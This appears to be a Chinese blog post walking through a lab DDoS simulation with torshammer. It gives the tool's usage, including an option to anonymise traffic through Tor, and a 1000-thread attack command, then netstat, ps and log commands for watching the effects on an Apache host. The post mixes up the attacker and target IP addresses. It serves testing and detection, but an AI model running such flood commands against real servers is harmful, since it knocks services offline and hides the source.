DDOS攻击模拟测试

DDOS攻击模拟测试
1.发起DDOS攻击的主机: 192.168.0.13
2.受到DDOS攻击的主机: 192.168.0.18

一.发起DDOS攻击主机
主机IP: 192.168.0.13
1.使用torshammer工具进行模拟

1	./torshammer.py -h #参数使用介绍

./torshammer.py -t <target> [-r <threads> -p <port> -T -h]

-t|--target <Hostname|IP>

-r|--threads <Number of threads> Defaults to 256

-p|--port <Web Server Port> Defaults to 80

-T|--tor Enable anonymising through tor on 127.0.0.1:9050

-h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

2.向192.168.0.13发起DDOS攻击

1	./torshammer.py -t 192.168.0.13 -r 1000

二.受攻击的主机
主机IP: 192.168.0.18
web: apache+php

1.查看网络连接状态

1	sudo netstat -n -t \| grep SYN_RECV\| grep :80 #发现大量SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:52505 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:49423 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:41616 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:43046 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:47337 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:33997 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:33155 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:37627 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:53313 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:43530 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:54954 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:52878 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:55284 SYN_RECV

tcp 0 0 192.168.0.13:80 192.168.0.18:60586 SYN_RECV

........

#统计SYN_RECV数量

1 2	sudo netstat -n -t \| grep SYN_RECV\| grep :80 \|wc -l 29

#查看发起SYN_RECV的主机IP

1 2	sudo netstat -ntu\| grep SYN_RECV \|awk '{print $5}' \| cut -d: -f1 \| sort \| uniq -c 128 192.168.0.18

#时实查看192.168.0.18的网络连接状态

1	sudo watch -n 1 "netstat -n -t \|grep 192.168.0.18"

2.查看apache进程

sudo ps -efl |grep apache2

1 S root 9936 1 0 80 0 - 26434 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9940 9936 0 80 0 - 26714 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9941 9936 0 80 0 - 26581 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9942 9936 0 80 0 - 26687 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9943 9936 0 80 0 - 26712 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9944 9936 0 80 0 - 26581 poll_s 11:30 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9996 9936 0 80 0 - 26581 poll_s 11:31 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9997 9936 0 80 0 - 26714 poll_s 11:31 ? 00:00:00 /usr/sbin/apache2 -k start

5 S www-data 9998 9936 0 80 0 - 26611 poll_s 11:31 ? 00:00:00 /usr/sbin/apache2 -k start

......

1 2	sudo ps -efl \|grep apache2 \|wc -l #启用了152个apache进程 152

3.apache访问日志文件也在快速增长

1	watch -n 1 ls -hl /var/log/apache2/access.log

1	tail -f /var/log/apache2/access.log

4.访问192.168.0.18的网站一开始打开缓慢，后来就无法打开了.
也不知道怎么搞的, 开始对我笔记本发起DDOS攻击的时候,导致笔记死机了.

(责任编辑：IT)

搜索

热门标签:

DDOS攻击模拟测试